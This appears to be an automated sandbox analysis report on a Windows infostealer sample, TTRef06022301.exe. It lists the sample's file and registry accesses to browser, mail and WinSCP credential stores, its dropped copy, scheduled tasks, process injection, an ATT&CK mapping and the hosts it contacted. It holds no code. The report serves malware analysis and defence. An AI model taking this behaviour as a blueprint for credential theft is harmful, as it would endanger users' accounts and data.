                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TTRef06022301.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Users\user\Desktop\TTRef06022301.exe | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: Yara match | File source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: TTRef06022301.exe PID: 5996, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: iJyzakGsXF.exe PID: 3696, type: MEMORYSTR
                  ATT&CK matrix, one line per tactic column (digits shown before a technique name are kept exactly as the report displays them):

                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: 211 Windows Management Instrumentation; 1 Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                  Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                  Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                  Defense Evasion: 11 Disable or Modify Tools; 2 Obfuscated Files or Information; 12 Software Packing; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 111 Process Injection; Compile After Delivery; Indicator Removal from Tools; Masquerading
                  Credential Access: 1 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: 1 File and Directory Discovery; 114 System Information Discovery; 1 Query Registry; 111 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                  Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                  Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                  Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                  Behavior Graph ID: 803161 | Sample: TTRef06022301.exe | Startdate: 09/02/2023 | Architecture: WINDOWS | Score: 100
                  Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 4 other signatures

                  Process tree (from the behavior graph):
                  TTRef06022301.exe (started)
                      dropped: C:\Users\user\AppData\...\iJyzakGsXF.exe (PE32); C:\Users\...\iJyzakGsXF.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp685E.tmp (XML); C:\Users\...\TTRef06022301.exe.log (ASCII)
                      signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 2 other signatures
                      TTRef06022301.exe (started)
                          network: keefort.com.ec 88.99.90.21, ports 49716, 49721, 587 (HETZNER-ASDE, Germany); api4.ipify.org 104.237.62.211, ports 443, 49715 (WEBNXUS, United States); 2 other IPs or domains
                      powershell.exe (started) -> conhost.exe (started)
                      powershell.exe (started) -> conhost.exe (started)
                      schtasks.exe (started) -> conhost.exe (started)
                  iJyzakGsXF.exe (started)
                      signatures: Injects a PE file into a foreign processes
                      iJyzakGsXF.exe (started)
                          network: 173.231.16.76, ports 443, 49718 (WEBNXUS, United States); 192.168.2.1 (unknown); 2 other IPs or domains
                          signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                      schtasks.exe (started) -> conhost.exe (started)
                      iJyzakGsXF.exe (started)

                  Source | Detection | Scanner | Label
                  TTRef06022301.exe | 66% | Virustotal |
                  No Antivirus matches
                  Source | Detection | Scanner | Label
